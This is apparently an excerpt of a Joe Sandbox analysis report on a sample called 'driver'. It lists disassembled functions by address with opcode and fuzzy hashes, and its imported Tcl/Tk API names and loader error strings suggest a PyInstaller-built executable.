Instruction Fuzzy Hash: 78D1D762A4A6428AEB688E2BC15027E23A4EB05F4CF144235CE4D877D6CFBDF845E744

Function 00007FF6A29B9870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: 61134e8419d18580f608eb519f796e0bf933a6b957e187e9c113da2979cb7bd3
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: 2CC16F762281E08BD289EB29E47947A73D1F78930DB95406BEF87477C6CB3CA514EB10

Function 00007FF6A29C2C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: afe170a142784a748a2a1dd021b87ca6af2308675ab4a00d215a053c83b0b71f
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: E4B15D72E4A7858AE765CF2AC05427C3BA0EB49F4CF244136DA4E87396CFB9E441E744

Function 00007FF6A29CE5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: ee511e0c381f4b1b422673b99d57c19890910a4fbc740e72c79c96508fd82674
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: 9B81E172A5D7818AEB74CB1AA54137A7A91FB45F98F104235DBCE83B96CE7CF4009B00

Function 00007FF6A29D6488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction ID: 019c98d587440cc99bfa3956a110da962810b041cbd2a087a786187815854de8
Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction Fuzzy Hash: 3061D822E8E29246FF648A2AA45427D66C0AF41F68F544239D71DC76D7DEEDF840FB00

Function 00007FF6A29C21D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 6defe4e2d673c17e62b55b8aaab878379c257bb8249b4bdce645552e58f115fb
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 7F516476E596518AE7688B2AC04423837A0EB55F6CF244231CE4D977DACFBAF843D740

Function 00007FF6A29C19B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 2306c8a34213a9612777a8cd8360abea726588627feed3ef37b810c75fb433be
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 2851A536A596518AE7248B2AC04023833A0EB48F6CF644135CE4D977E6DFBAFC43DB54

Function 00007FF6A29C1DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: a127e8c8f482204a9d6992f0b861145c2e31b5b1116cd56820a4db5ba2abb2c6
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 3D518676A596528AE7248B2AD05023837A0EB49F5CF244131DE4D87796CFBAFC43D748

Function 00007FF6A29C1BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 188020f3ae1795624f7eab1ca551673fa16b2bc81950928636fbdabf1f18661a
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 1651B436A9A6518AE7248B2AC04033837A1EB49F5CF644131DE4C977A6CF7AFC53E744

Function 00007FF6A29C1FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 8acfb3682054348317041491ed1d2189e9741e6262db0a0670bb2c066a561280
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 73518676E5965189E724CB2AC44023937A0EB55F6CF244132CE4D977AACFBAFC42D740

Function 00007FF6A29C17B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 81653ffcde6cb21d61442bcafb382d0349f4bb269b2835a36511de5ded52deae
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: D051A136A5E6518AE7288B2AD04023C27A1EB44F5CF245131CE4D97796CF7AFC53E784

Function 00007FF6A29C5DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: cc49b1db6ca56a80d85efcc3eaf19be91c34f19d120cc1ba5b70b5e101f47834
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: AA41DBE2C8B74E5CF965892A09147B85680DF62FAAD5852B0DD9DF33C3DD8C3987D101

Function 00007FF6A29C9F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: 13c49d6db9892a2184a92605dfb6d4f1fb06fdcfcfe720855f619d89f78daac0
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 23411232719A5486EF08CF2BDA141B9B3A1BB48FD8B099032DE4DD7B59DE7CD5419300

Function 00007FF6A29C8154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: d7f7466a57967364049ad6695683a524282600ee8934d86edcad7a222d072b7c
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 5B31F432B4AB4285E7659F22A44413E66D4BB84FD4F044238EA4D93BD6DF7CE402A304

Function 00007FF6A29D95E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: b02a20728d05f5bcfd1f868d1a3bcd1540173dab6b6c3c988f1fe32e428f42a8
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: 2DF068717592958ADBD8DF69A40262A77D4FB487C4F808039E58DC3B04DEBCD0619F04

Function 00007FF6A29BD37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: 97a0fbf5ebaae34f6a8e3fd8e3dd5779c2eb728897efb57adcf3efa3f7f6377a
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: E8A0022298EC0AD0F6448B02ECA41352371FB61B4CB400035E10EC50B39FBCE400F310

Function 00007FF6A29B76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6A29B76C7
GetLastError.KERNEL32 ref: 00007FF6A29B76D9
GetProcAddress.KERNEL32 ref: 00007FF6A29B7715
GetLastError.KERNEL32 ref: 00007FF6A29B7727
GetProcAddress.KERNEL32 ref: 00007FF6A29B7740
GetLastError.KERNEL32 ref: 00007FF6A29B7752
GetProcAddress.KERNEL32 ref: 00007FF6A29B776B
GetLastError.KERNEL32 ref: 00007FF6A29B777D
GetProcAddress.KERNEL32 ref: 00007FF6A29B7799
GetLastError.KERNEL32 ref: 00007FF6A29B77AB
GetProcAddress.KERNEL32 ref: 00007FF6A29B77C7
GetLastError.KERNEL32 ref: 00007FF6A29B77D9
GetProcAddress.KERNEL32 ref: 00007FF6A29B77F5
GetLastError.KERNEL32 ref: 00007FF6A29B7807
GetProcAddress.KERNEL32 ref: 00007FF6A29B7823
GetLastError.KERNEL32 ref: 00007FF6A29B7835
GetProcAddress.KERNEL32 ref: 00007FF6A29B7851
GetLastError.KERNEL32 ref: 00007FF6A29B7863

Strings

Tcl_ConditionFinalize, xrefs: 00007FF6A29B792D, 00007FF6A29B794F
Tcl_ConditionNotify, xrefs: 00007FF6A29B795B, 00007FF6A29B797D
Tcl_Finalize, xrefs: 00007FF6A29B778F, 00007FF6A29B77B1
GetProcAddress, xrefs: 00007FF6A29B76EF
Tcl_MutexLock, xrefs: 00007FF6A29B78A3, 00007FF6A29B78C5
Tcl_ThreadQueueEvent, xrefs: 00007FF6A29B79B7, 00007FF6A29B79D9
Tcl_NewStringObj, xrefs: 00007FF6A29B7ACB, 00007FF6A29B7AED
Tk_GetNumMainWindows, xrefs: 00007FF6A29B7C97, 00007FF6A29B7CB9
Tcl_Init, xrefs: 00007FF6A29B76C0, 00007FF6A29B76DF
Tcl_MutexUnlock, xrefs: 00007FF6A29B78D1, 00007FF6A29B78F3
Tcl_SetVar2, xrefs: 00007FF6A29B7A41, 00007FF6A29B7A63
Tcl_JoinThread, xrefs: 00007FF6A29B7875, 00007FF6A29B7897
Tk_Init, xrefs: 00007FF6A29B7C69, 00007FF6A29B7C8B
Tcl_EvalFile, xrefs: 00007FF6A29B7B83, 00007FF6A29B7BA5
Tcl_CreateThread, xrefs: 00007FF6A29B7819, 00007FF6A29B783B
Tcl_Alloc, xrefs: 00007FF6A29B7C0D, 00007FF6A29B7C2F
Tcl_NewByteArrayObj, xrefs: 00007FF6A29B7AF9, 00007FF6A29B7B1B
Tcl_GetCurrentThread, xrefs: 00007FF6A29B7847, 00007FF6A29B7869
Tcl_CreateInterp, xrefs: 00007FF6A29B770B, 00007FF6A29B772D
Tcl_DoOneEvent, xrefs: 00007FF6A29B7761, 00007FF6A29B7783
Tcl_MutexFinalize, xrefs: 00007FF6A29B78FF, 00007FF6A29B7921
Tcl_CreateObjCommand, xrefs: 00007FF6A29B7A6F, 00007FF6A29B7A91
Tcl_FindExecutable, xrefs: 00007FF6A29B7736, 00007FF6A29B7758
Tcl_ThreadAlert, xrefs: 00007FF6A29B79E5, 00007FF6A29B7A07
Tcl_DeleteInterp, xrefs: 00007FF6A29B77EB, 00007FF6A29B780D
Tcl_EvalEx, xrefs: 00007FF6A29B7BB1, 00007FF6A29B7BD3
Tcl_GetObjResult, xrefs: 00007FF6A29B7B55, 00007FF6A29B7B77
Tcl_GetVar2, xrefs: 00007FF6A29B7A13, 00007FF6A29B7A35
Tcl_GetString, xrefs: 00007FF6A29B7A9D, 00007FF6A29B7ABF
Tcl_ConditionWait, xrefs: 00007FF6A29B7989, 00007FF6A29B79AB
Tcl_SetVar2Ex, xrefs: 00007FF6A29B7B27, 00007FF6A29B7B49
Tcl_EvalObjv, xrefs: 00007FF6A29B7BDF, 00007FF6A29B7C01
Tcl_Free, xrefs: 00007FF6A29B7C3B, 00007FF6A29B7C5D
Tcl_FinalizeThread, xrefs: 00007FF6A29B77BD, 00007FF6A29B77DF
Failed to get address for %hs, xrefs: 00007FF6A29B76E8

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 616c99a6fb8ce4113730a897815d4c5eee867979b0081abeb44ab7417fc0096e
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: FE02B321ACFB07D1FA549B67E8605B422A1BF08F5DF850135D41E822A7EFBCF148B260

Function 00007FF6A29B81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6A29B88A7,?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B821C

Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA

Strings

CreateDirectory, xrefs: 00007FF6A29B836C
%.*s, xrefs: 00007FF6A29B82FC
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6A29B828D
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6A29B8363
\, xrefs: 00007FF6A29B8251
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6A29B82C9
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6A29B8230
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6A29B81F3

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: c5dae3934ef6882ee404ad6c9267fd937729bb3f5562b0bdf3f77c849e5be53d
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
